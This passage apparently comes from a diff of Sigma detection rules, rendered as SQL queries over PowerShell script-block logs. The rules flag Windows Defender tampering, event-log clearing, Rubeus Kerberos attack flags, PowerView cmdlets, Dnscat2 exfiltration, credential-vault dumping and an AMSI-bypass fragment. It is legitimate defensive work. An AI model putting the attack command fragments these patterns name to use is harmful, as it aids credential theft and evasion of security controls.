'%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "title": "Suspicious Eventlog Clear", + "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.t1070.001" ], "falsepositives": [ - "Unknown" + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_ps_susp_clear_eventlog.yml" }, { - "title": "Windows Firewall Profile Disabled", - "id": "488b44e7-3781-4a71-888d-c95abfacf44d", - "status": "experimental", - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "author": "Austin Songer @austinsonger", + "title": "Suspicious Invoke-Item From Mount-DiskImage", + "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "status": "test", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1553.005" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml" + "filename": "posh_ps_run_from_mount_diskimage.yml" + }, + { + "title": "Manipulation of User Computer or Group Security Principals Across AD", + "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "status": "test", + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.t1136.002" + ], + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + ], + "filename": "posh_ps_directoryservices_accountmanagement.yml" }, { - "title": "Powershell Sensitive File Discovery", - "id": "7d416556-6502-45b2-9bad-9d2f05f38997", - "status": "experimental", - "description": "Detect adversaries enumerate sensitive files", - "author": "frack113", + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "posh_ps_sensitive_file_discovery.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Dump Credentials from Windows Credential Manager With PowerShell", - "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "title": "Remove Account From Domain Admin Group", + "id": "48a45d45-8112-416b-8a67-46e03a4b2107", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.impact", + "attack.t1531" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml" + "filename": "posh_ps_susp_remove_adgroupmember.yml" }, { - "title": "Powershell Directory Enumeration", - "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "status": "test", - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "title": "Suspicious GetTypeFromCLSID ShellExecute", + "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "status": "experimental", + "description": "Detects suspicious Powershell code that execute COM Objects", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_directory_enum.yml" + "filename": "posh_ps_susp_gettypefromclsid.yml" }, { - "title": "Suspicious PowerShell WindowStyle Option", - "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", - "status": "test", - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "author": "frack113, Tim Shelton (fp AWS)", - "tags": [ - "attack.defense_evasion", - "attack.t1564.003" - ], + "title": "Suspicious X509Enrollment - Ps Script", + "id": "504d63cb-0dba-4d02-8531-e72981aace2c", + "status": "experimental", + "description": "Detect use of X509Enrollment", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_windowstyle.yml" + "filename": "posh_ps_x509enrollment.yml" }, { - "title": "Get-ADUser Enumeration Using UserAccountControl Flags", - "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", - "status": "test", - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "author": "frack113", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "posh_ps_as_rep_roasting.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "Powershell Detect Virtualization Environment", - "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", - "status": "test", - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "author": "frack113, Duc.Le-GTSC", + "title": "Windows Defender Exclusions Added - PowerShell", + "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "status": "experimental", + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "author": "Tim Rauch", "tags": [ "attack.defense_evasion", - "attack.t1497.001" + "attack.t1562", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" ], - "filename": "posh_ps_detect_vm_env.yml" + "filename": "posh_ps_win_defender_exclusions_added.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Remove Account From Domain Admin Group", - "id": "48a45d45-8112-416b-8a67-46e03a4b2107", + "title": "Powershell WMI Persistence", + "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "status": "test", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1531" + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 